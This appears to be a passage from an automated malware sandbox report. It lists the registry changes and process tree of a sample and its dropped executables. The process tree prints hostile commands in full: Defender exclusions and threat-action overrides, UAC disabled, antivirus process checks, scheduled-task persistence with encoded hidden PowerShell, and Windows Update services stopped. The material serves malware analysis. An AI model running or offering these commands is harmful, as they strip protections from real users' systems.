| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 | C:\Users\Admin\Pictures\POakPvFxeBVc9spYxvgYniad.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\336473\Rent.pif | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\336473\Rent.pif | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\eqP4jOc2woE7Tde5oTl3vAbj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\336473\Rent.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\336473\Rent.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\336473\Rent.pif | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\K1cMIEpl35iIMRssKBcYXhPh.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\eqP4jOc2woE7Tde5oTl3vAbj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\336473\Rent.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\336473\Rent.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\336473\Rent.pif | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\K1cMIEpl35iIMRssKBcYXhPh.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe"
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 868 -s 72
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1340 -s 68
C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 72
C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 96
C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
"C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe" /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1316 -s 856
C:\Users\Admin\Pictures\K1cMIEpl35iIMRssKBcYXhPh.exe
"C:\Users\Admin\Pictures\K1cMIEpl35iIMRssKBcYXhPh.exe" /s
C:\Windows\system32\taskeng.exe
taskeng.exe {77D183DD-81CA-4F2D-97BF-1C7F6DAE2F90} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
C:\Users\Admin\Pictures\eqP4jOc2woE7Tde5oTl3vAbj.exe
"C:\Users\Admin\Pictures\eqP4jOc2woE7Tde5oTl3vAbj.exe"
C:\Users\Admin\AppData\Local\Temp\eng.exe
"C:\Users\Admin\AppData\Local\Temp\eng.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 336473
C:\Windows\SysWOW64\findstr.exe
findstr /V "EnquiryAnContributionRefers" Tank
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Ph + Shoot 336473\r
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\336473\Rent.pif
336473\Rent.pif 336473\r
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Users\Admin\Pictures\POakPvFxeBVc9spYxvgYniad.exe
"C:\Users\Admin\Pictures\POakPvFxeBVc9spYxvgYniad.exe"
C:\Users\Admin\Pictures\gDxphg0oWiHodiMmsEznEhcd.exe
"C:\Users\Admin\Pictures\gDxphg0oWiHodiMmsEznEhcd.exe"
C:\Users\Admin\AppData\Local\Temp\7zSAC.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS2BF.tmp\Install.exe
.\Install.exe /NQHxdidUQs "385118" /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\AppData\Local\Temp\1000285001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000285001\FirstZ.exe"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 16:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\asVPZnM.exe\" 1g /UAxdidEodX 385118 /S" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bqGGCwwWIommTRgeuN
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bqGGCwwWIommTRgeuN
C:\Windows\system32\taskeng.exe
taskeng.exe {8C65A581-9312-4F25-8232-04D541D5F9FA} S-1-5-18:NT AUTHORITY\System:Service:
C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\asVPZnM.exe
C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\asVPZnM.exe 1g /UAxdidEodX 385118 /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "goRfUzjXC" /SC once /ST 12:40:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "goRfUzjXC"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "goRfUzjXC"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
